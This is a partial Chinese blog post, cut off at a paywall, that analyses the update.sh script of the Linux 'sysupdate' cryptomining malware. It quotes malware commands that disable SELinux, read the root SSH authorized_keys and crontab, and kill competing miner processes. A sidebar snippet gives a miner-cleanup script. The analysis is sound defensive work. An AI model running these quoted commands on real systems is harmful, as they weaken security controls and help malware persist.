linux update.sh,Linux系统sysupdate挖矿病毒之update.sh脚本分析 | CN-SEC 中文网

最新推荐文章于 2022-03-19 22:54:24 发布
最新推荐文章于 2022-03-19 22:54:24 发布
阅读量674 收藏
点赞数
文章标签: linux update.sh

这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。

背景

这次废话不多说,直接上,背景感觉毫无意义。

分析

现象确认

首先确认现象,通过查看系统进程发现存在CPU占用过高的现象,如下图:

9f12fc1950e8cd2adf4a6136c07bac84.png

查看进程信息:

d9df609fc3d03b6dbefbc85cfc4b7847.png

进程关联查看,发现该病毒启动时间是在2020.09.18 10:00:01。

1d282eae011c8567eaa35c762072edfb.png

update.sh脚本分析

通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析。

8e6adf1586624a363887a3dfbdc2756b.png

定义系统变量

关闭selinux防火墙,隐藏输出的错误信息,如果有错误信息就输出到空设备2>/dev/null空设备:

setenforce 0 2>dev/null

关闭selinux:

echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

把内容同步写入磁盘

sync && echo 3 >/proc/sys/vm/drop_caches

设置变量:

crondir='/var/spool/cron/'"$USER"cont=`cat ${crondir}`

查看ssh公钥信息

ssht=`cat /root/.ssh/authorized_keys` #ssht = cat /root/.ssh/authorized_keys

关闭相关病毒程序

使用ps auxf查看所有进程,并针对kinsiing进行查找,awk是tab分割,print $2是取出第二个单词,ps auxf查看进程中第二单词为PID(这里关闭的进程较多,只列举其中一些):

ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I %

最低0.47元/天 解锁文章
凛冬之怒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
update_sh:这是一个用于开发中的 drupal 更新周期的脚本集合。 每个团队成员在从存储库更新代码后运行“update.sh local”命令
06-28
Drupal update.sh 由 undpaul 这是我们现在使用的更新脚本的基本模板,用于在存储库中进行代码更新后更新 Drupal 安装的所有部分。 它用于本地环境以及集成、测试和实时站点以执行不同的任务,以确保按照我们希望的方式配置 drupal 站点。 过去,每当开发人员、测试人员、pm 或任何其他人员想要在自己的环境中运行最新配置时,都必须完成一系列任务以确保配置完全按照预期方式进行设置是。 获取存储库后,例如必须运行 update.php,恢复一些功能,手动删除一些旧字段,运行一些批处理操作,更新搜索索引,......。 除了跟上所有要完成的任务之外,总有可能会错过任务、以错误的顺序执行或使用错误的参数执行。 无法证明任务的执行方式和顺序与更新 drupal 应用程序所需的顺序相同,使其正常运行。 解决办法很简单:消除人为因素。 因此,我们开始在我们工作的每个项目中
update.sh
weixin_30737433的博客
09-27 301
#!/bin/sh #$1:install path $2:hub link ip and portinstall_path=$1if [ -z "$install_path" ]then install_path=$HOMEfiUUID=$2HostID=$3HubIpPort=$4 install_dir="${install_path}/agent60"src_dir="agent60"...
yum-update.sh
知识的力量
09-25 541
#!/bin/sh SERVERS="192.168.199.131 192.168.199.132 192.168.199.134 192.168.199.135 192.168.199.136" PASSWORD=redhat username=root for SERVER in $SERVERS do echo "++++++++++++++++++++++++++"$SERV
roedep_update.sh
03-25
rosdep update更新失败问题解决时,会超时失败,使用这个脚循环执行,直到成功才退出,已测试有机率成功,特别是在下半夜的时候容易点。。。。
update-OpenSSH.sh
11-16
CentOS全版本升级脚本,CentOS6.4-CentOS8.0,顺便升级ssl与其他依赖,一键解决
update_app.rar_8812e update.app_LINUX升级_UPDATE.APP_y210 update.a
09-24
标题中的"update_app.rar_8812e update.app_LINUX升级_UPDATE.APP_y210 update.a"揭示了这次升级是针对8812e设备,并且涉及到Linux系统的更新。8812e可能是一个特定的硬件平台,如Wi-Fi模块或其他通信芯片。`update....
linux-linux更换系统软件源的脚本.zip
02-26
Linux操作系统中,系统软件源是获取更新、安装软件包的主要途径。软件源通常由Linux发行版维护者提供,它们包含了各种预编译的软件包,用户可以通过这些源下载并安装所需的软件。然而,有时默认的软件源可能由于...
Anaconda3-2021.05-Linux-x86-64
最新发布
05-07
这是一个Shell脚本,用于在Linux系统上进行Anaconda的安装。运行这个脚本时,用户将被引导完成安装过程,包括设置安装路径、同意许可协议、以及选择是否将Anaconda添加到PATH环境变量中,使得在终端中可以直接调用...
Miniconda3-py38_23.1.0-1-Linux-x86_64.zip
11-16
这个压缩包内包含了安装脚本 **Miniconda3-py38_23.1.0-1-Linux-x86_64.sh** 和一份 **使用说明.txt**,帮助用户了解如何在Linux系统上安装和使用Miniconda。 ### Miniconda的核心功能 1. **环境管理**:Miniconda...
gcc-arm-none-eabi-8-2019-q3-update-linux.tar.bz2
09-15
Known Changes and Issues: Thumb1 code size regression due to new register allocation: ...Multilib is now enabled with --with-multilib-list=rmprofile when building the toolchain from source. ...
putty.exe windows系统远程执行linux脚本
02-10
putty.exe windows系统远程执行linux脚本 1、下载putty.exe 2、将putty.exe 放在C:\Windows\System32\中 3、以上完成了putty.exe的安装 4、接下来就可以执行 5、cmd命令提示符 6、输入putty.exe -pw 密码**** -m .\...
linux使用update-alternatives切换java版本
08-30
Linux 使用 update-alternatives 切换 Java 版本 Linux 操作系统中切换 Java 版本是一项常见的操作, especialmente 在开发和测试环境中。update-alternatives 命令是 Linux 中的一个实用工具,可以用来管理和切换 ...
gcc-arm-none-eabi-9-2020-q2-update.zip
08-20
linux平台gcc编译器,gcc-arm-none-eabi-9-2020-q2-update-x64-linux.tar.bz2,gcc-arm-none-eabi-9-2020-q2-update-x64-linux.tar.bz2,只要5分,只要5分
gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2
08-10
gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2,官网最新的,官网下载比较慢。
清除挖矿病毒脚本-(shell6)
u010872015的专栏
07-20 202
shell脚本 #/bin/bash killall kdevtmpfsi killall kinsing killall networkservice killall sysupdate killall sysguard rm -rf /var/tmp/kinsing rm -rf /tmp/kdevtmpfsi crontab -u www -r 添加计时器 */1 * * * * /home/shell/xx.sh 备注 用crontab的计时器工具 安装ki...
生产环境上线脚本update.sh
weixin_34206899的博客
01-17 409
#!/bin/sh #Author:bobo365 Filelist=" web_trade1 static2 web_portfolio3 web_live4 web_topic5 web_api6 service_console7 service_task8 admin_crm9 admin_admin10 mobile_static11 mo...
updatefile.sh - Linux下代码更新脚本
weixin_30633405的博客
06-30 396
以下写的是一个关于文件上传的代码shell脚本 该篇文章主要有下面几个方面的考虑: 1.文章主要用于在Linux下代码包批量上传; 2.将被覆盖的代码备份做备份,用于兴许做问题查看或者代码的回退(回退须要相应的脚本。暂未编写); 3.当次上传的代码,也做备份,用于做兴许问题跟踪。 下面为更新脚本 转载于:https://www.cnbl...
linux脚本(shell)——输入密码脚本和怎么写病毒流氓脚本的思路
m0_48638643的博客
03-19 1477
编写这三个脚本,以及编写脚本的几个难点,统计变量的长度、使用正则去匹配、如何使用awk命令
linux启动.sh脚本
09-16
对于Linux系统,启动脚本(也称为启动脚本)通常使用扩展名为.shShell脚本文件。这些脚本文件包含一系列要在系统启动时执行的命令和操作。 要创建一个启动脚本,请按照以下步骤进行操作: 1. 打开文本编辑器,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值